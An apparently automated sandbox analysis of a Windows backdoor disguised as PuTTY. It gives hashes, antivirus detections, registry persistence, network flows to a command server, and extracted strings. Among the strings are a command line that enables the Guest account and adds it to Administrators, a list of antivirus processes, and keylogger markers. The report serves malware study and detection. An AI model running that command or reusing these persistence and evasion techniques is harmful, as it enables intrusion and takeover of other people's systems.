Analysis Date2015-03-14 11:46:18
MD592c9c9a8a135a09eafdf6a007eb9bd8e
SHA14429a154ca0f4b348bb900ec57d6dda14931312a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 95e4b0120aa46aec68bb9dba841cc044 sha1: 55a1227955fc7e3987ddc78c2ad0e52372e203a0 size: 110592
Section.rdata md5: e70c6dd6ab73620014635ef7fc462540 sha1: 407cfba9474fd2cb2c8cd2e7e920d49475971665 size: 16384
Section.data md5: da14606f72453fab1c3cb132a2118a7c sha1: 5f3c7807b785c6e1d7b23b868a1064a979eef5b0 size: 12288
Section.rsrc md5: 320d8d8836332ca004a79f9f124b8963 sha1: 6f8b0cc6a8a9390dcc843bf7ec6e6215dcb8be53 size: 4096
Timestamp2014-05-31 12:46:02
Pdb path@
VersionLegalCopyright: 版权所有(C) 2014
InternalName:
FileVersion:
CompanyName: putty
PrivateBuild:
LegalTrademarks:
Comments:
ProductName:
SpecialBuild:
ProductVersion:
FileDescription: www.putty.com
OriginalFilename:
PEhashb5fd5901fefd2c8c09402669105b3cf6fa5756ec
IMPhashcb871d0278281aa3fb8279fd1a657917
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.385920
AVAlwil (avast)GenMaliciousA-BJK [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.385920
AVAuthentiumW32/A-10f7c05c!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen7
AVBullGuardGen:Variant.Kazy.385920
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Backdoor.Zegost.BZ4
AVClamAVno_virus
AVDr. WebTrojan.DownLoader11.17136
AVEmsisoftGen:Variant.Kazy.385920
AVEset (nod32)Win32/Farfli.AXW
AVFortinetW32/Farfli.AWN!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Kazy.385920
AVGrisoft (avg)BackDoor.Generic_r.HBR
AVIkarusTrojan-GameThief.Win32.Magania
AVK7Trojan ( 0049ae911 )
AVKaspersky 2015Backdoor.Win32.Farfli.cil
AVMalwareBytesno_virus
AVMcafeeGeneric-FASR!92C9C9A8A135
AVMicrosoft Security EssentialsBackdoor:Win32/Zegost.BZ
AVMicroWorld (escan)Gen:Variant.Kazy.385920
AVRisingno_virus
AVSophosError Scanning File
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.P2P-Worm.Palevo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin ➝
C:\malware.exe\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

Flows TCP192.168.1.1:1031 ➝ 216.99.157.163:7777
Flows TCP192.168.1.1:1031 ➝ 216.99.157.163:7777
Flows TCP192.168.1.1:1032 ➝ 216.99.157.163:7777
Flows TCP192.168.1.1:1033 ➝ 216.99.157.163:7777
Flows TCP192.168.1.1:1034 ➝ 216.99.157.163:7777
Flows TCP192.168.1.1:1035 ➝ 216.99.157.163:7777
Flows TCP192.168.1.1:1036 ➝ 216.99.157.163:7777

Raw Pcap
0x00000000 (00000)   e901                                  ..

0x00000000 (00000)   e501                                  ..

0x00000000 (00000)   e601                                  ..

0x00000000 (00000)   e701                                  ..

0x00000000 (00000)   e601                                  ..

0x00000000 (00000)   e601                                  ..


Strings
TranslateMessage
DispatchMessageA
zy
InitializeCriticalSection
KERNEL32.dll
DeleteFileA
lstrlenA
KERNEL32.dll
CharNextA
USER32.dll
GetLastError
KERNEL32.dll
GetFileAttributesA
CreateDirectoryA
\
FreeLibrary
KERNEL32.dll
open
glstrlenA
KERNEL32.dll
FreeLibrary
Shell32.dll
lstrlenA
KERNEL32.dll
GetDiskFreeSpaceExA
GetDriveTypeA
%s\*.*
hh
wsprintfA
USER32.dll
%s\*.*
DeleteFileA
LocalAlloc
KERNEL32.dll
lstrlenA
KERNEL32.dll
iKERNEL32.dll
LocalFree
LocalAlloc
KERNEL32.dll
jLocalFree
KERNEL32.dll
lstrlenA
KERNEL32.dll
lstrlenA
KERNEL32.dll
USER32.dll
wsprintfA
pplstrlenA
KERNEL32.dll
system\cURRENTcONTROLsET\sERVICES\%s
system\cURRENTcONTROLsET\sERVICES\%s
InstallModule0
tluafed\0atsniw
tluafed\0atsniw
system\cURRENTcONTROLsET\sERVICES\%s
.
[Z
%s:\dOCUMENTS
wINSTA0\dEFAULT
{|{|
\ourlog.dat
GetKeyState
GetAsyncKeyState
\ourlog.dat
}
~\ourlog.dat
%24s
%15s
SystemParametersInfoA
keybd_event
v
stu
.ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
http://
https://
Mozilla/4.0 (compatible)
capGetDriverDescriptionA
AVICAP32.dll
avp.exe
360tray.exe
KvMonXP.exe
RavMonD.exe
360sd.exe
Mcshield.exe
egui.exe
kxetray.exe
knsdtray.exe
TMBMSRV.exe
avcenter.exe
ashDisp.exe
system\cURRENTcONTROLsET\sERVICES\%s
f
:\
tluafed\0atsniw
.
.KERNEL32.dll
lstrlenA
.EXPLORER.EXE
Mozilla/4.0 (compatible)
capGetDriverDescriptionA
AVICAP32.dll
capCreateCaptureWindowA
AVICAP32.dll
paCoediVC
wx
.

080404b0
Ajjjj
(C) 2014
Comments
CompanyName
FileDescription
FileVersion
InternalName
jjjj
@jjjj
jjjjh
jjjjj
jjjjjj
jjjjjjj
jjjjjjjjh
LegalCopyright
LegalTrademarks
OriginalFilename
PrivateBuild
ProductName
ProductVersion
putty
SpecialBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
www.putty.com
                                           
								
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
0ddmREt\SECIVREs\TEsLORTNOcTNERRUc\metsys
0NOGOLNIw\NOISREvTNERRUc\tn SWODNIw\TFOSORCIm\erawtfos
0NOISREvTNERRUc\SWODNIw\TFOSORCIm\erawtfos
0s%rCtlus%L
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??1type_info@@UAE@XZ
216.99.157.163
%-24s %-15s 
%-24s %-15s 0x%x(%d) 
??2@YAPAXI@Z
#32770
??3@YAXPAX@Z
{4_^]3
9_|t93
~(9~$u
A<;B(}
A@;B,}
AddAccessAllowedAce
AdjustTokenPrivileges
Administrators
advapi32.dll
ADVAPI32.dll
AheadLib
AllocateAndInitializeSid
Application
\Application Data\Microsoft\Netw
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
.?AVtype_info@@
Backspace
bad Allocate
bad buffer
_beginthreadex
BitBlt
BlockInput
<body><h1>403 Forbidden</h1></body>
buffer error
BuildExplicitAccessWithNameA
calloc
CancelIo
[CapsLock]
C:\Documents and Settings\Administrator\
ClearEventLogA
CloseClipboard
CloseDesktop
CloseEventLog
CloseHandle
CloseServiceHandle
CloseWindow
\CMD.EXE
CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++ && NET LOCALGROUP ADMINISTRATORS GUEST /add && NET STOP sHAREDaCCESS /Y && DEL "%s" && SC DELETE sHAREDaCCESS
CONNECT 
ControlService
ConvertSidToStringSidA
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBSection
CreateEnvironmentBlock
CreateEventA
CreateFileA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
ctions\pbk\rasphone.pbk
__CxxFrameHandler
_CxxThrowException
D$(8D*
@.data
data error
.DEFAULT\Keyboard Layout\Toggle
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
DestroyCursor
Device
DialParamsUID
DisconnectNamedPipe
DllCanUnloadNow
DllGetClassObject
DNAMMOC\NEPO\LLEHS\EXE.EROLPXEI\SNOITACILPPa
Documents an
Documents and Settings\
DownArrow
;D$<s!
d Settings\
D$$SUV
DuplicateTokenEx
edentials#
EmptyClipboard
empty distance tree with lengths
eNABLEaDMINtsREMOTE
eNABLED
<Enter>
EnterCriticalSection
EnumProcessModules
EnumWindows
_errno
Everyone
_except_handler3
Execute
ExitProcess
ExitWindowsEx
fDenyTSConnections
Fdf+Fh
file error
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
FreeSid
g:]%d-%d-%d  %d:%d:%d
GDI32.dll
GetClipboardData
GetCurrentProcess
GetCurrentThreadId
GetCursorInfo
GetCursorPos
GetDesktopWindow
GetDIBits
GetDiskFreeSpaceExA
GetDriveTypeA
GetFileSize
GetForegroundWindow
GetLastError
GetLengthSid
GetLocalTime
GetLogicalDriveStringsA
GetMessageA
GetModuleFileNameA
GetModuleFileNameExA
GetNamedSecurityInfoA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetSystemDirectoryA
GetSystemInfo
GetSystemMetrics
GetThreadDesktop
GetTickCount
GetTokenInformation
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GetWindowTextA
GetWindowThreadProcessId
GlobalAlloc
GlobalFree
GlobalLock
GlobalMemoryStatus
GlobalSize
GlobalUnlock
}!h0/B
HARDWARE\DESCRIPTION\System\CentralProcessor\0
HeapAlloc
HeapFree
Hotkey
|$HPWS
HrCg@b	g(
http://
HTTP/1.0 200 OK
Http/1.1 403 Forbidden
ICClose
ICCompressorFree
ICOpen
ICSendMessage
ICSeqCompressFrame
ICSeqCompressFrameEnd
ICSeqCompressFrameStart
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
Insert
iNSTALLER
insufficient memory
InterlockedExchange
InternetCloseHandle
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
InternetReadFile
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid stored block lengths
invalid window size
IsValidSid
IsWindow
IsWindowVisible
Kernel32.dll
KERNEL32.dll
kugou_SetPlayerConfigDelegate
LeaveCriticalSection
LeftArrow
L$LQVS
LoadCursorA
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
L$,QWV
L$ RUPj
LsaClose
LsaFreeMemory
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
malloc
MapVirtualKeyA
memcpy
memmove
memset
MessageBoxA
Microsoft\Network\Conne
Microsoft\Network\Connections\pbk\rasphone.pbk
mouse_event
MoveFileA
MSVCP60.dll
MSVCRT.dll
MSVFW32.dll
MultiByteToWideChar
need dictionary
NETCACHE
Num Lock
OpenClipboard
OpenDesktopA
OpenEventA
OpenEventLogA
OpenInputDesktop
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenServiceA
OpenWindowStationA
ork\Connections\pbk\rasphone.pbk
OutputDebugStringA
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
PageDown
PageUp
PeekNamedPipe
PhoneNumber
PortNumber
PostMessageA
Process32First
Process32Next
PSAPI.DLL
Qhvidc
QueryMediaInfo
QueryServiceStatus
rams!%
$_RasDefa
RasDia
`.rdata
ReadFile
realloc
REG_BINARY
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
REG_DWORD
RegEnumKeyExA
RegEnumValueA
REG_EXPAND_SZ
REG_MULTI_SZ
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegQueryValueEx(Type)
RegSetKeySecurity
RegSetValueExA
RegSetValueEx(start)
REG_SZ
ReleaseDC
RemoveDirectoryA
ResetEvent
ResumeThread
RightArrow
Scroll
\secivreS\teSlortnoCtnerruC\METSYS
Security
SeDebugPrivilege
Select
SelectObject
SendMessageA
server.dat
\Server\svchost\Release\server.pdb
SeShutdownPrivilege
SetCapture
SetClipboardData
SetCursorPos
SetEntriesInAclA
SetErrorMode
SetEvent
SetFilePointer
SetLastError
SetNamedSecurityInfoA
SetProcessWindowStation
SetRect
SetSecurityDescriptorDacl
SetThreadDesktop
SetTokenInformation
SHDeleteKeyA
Shell32.dll
SHELL32.dll
ShellExecuteA
SHGetFileInfoA
SHGetSpecialFolderPathA
SHLWAPI.dll
sHUTDOWNwITHOUTLOGON
%slPa%ss#0
Snapshot
_snprintf
sOFTWARE\mICROSOFT\iNTERNET eXPLORER\mAIN
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
sOFTWARE\pOLICIES\mICROSOFT\wINDOWS
sprintf
%s%s*.*
%s%s%s
strcat
strchr
strcmp
_strcmpi
strcpy
stream end
stream error
strlen
strncat
strncmp
strncpy
_strnicmp
strrchr
_strrev
strstr
strtok
_strupr
System
SYSTEM
system\cURRENTCONTROLSET\cONTROL\tERMINAL sERVER
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
system\cURRENTcONTROLSET\sERVICES\tERMSERVICE
T+3x%A
T$DPVS
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
T$LPQR
T$LRWS
too many length or distance symbols
T$,PQh
T$(PQR
T$,RWV
tseNABLED
tZ9H tU9H$tP
unknown compression method
UpArrow
USER32.dll
USERENV.dll
VirtualAlloc
VirtualFree
W(9W$u
WaitForMultipleObjects
WaitForSingleObject
waveInAddBuffer
waveInClose
waveInGetNumDevs
waveInOpen
waveInPrepareHeader
waveInReset
waveInStart
waveInStop
waveInUnprepareHeader
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
WideCharToMultiByte
WindowFromPoint
Window Title
WinExec
WININET.dll
Winlogon
WINMM.dll
winsta0
WriteFile
WS2_32.dll
WSAIoctl
wsprintfA
WTSAPI32.dll
WTSFreeMemory
WTSGetActiveConsoleSessionId
WTSQuerySessionInformationA
WTSQueryUserToken
|$ WUSV
[xiao:] %s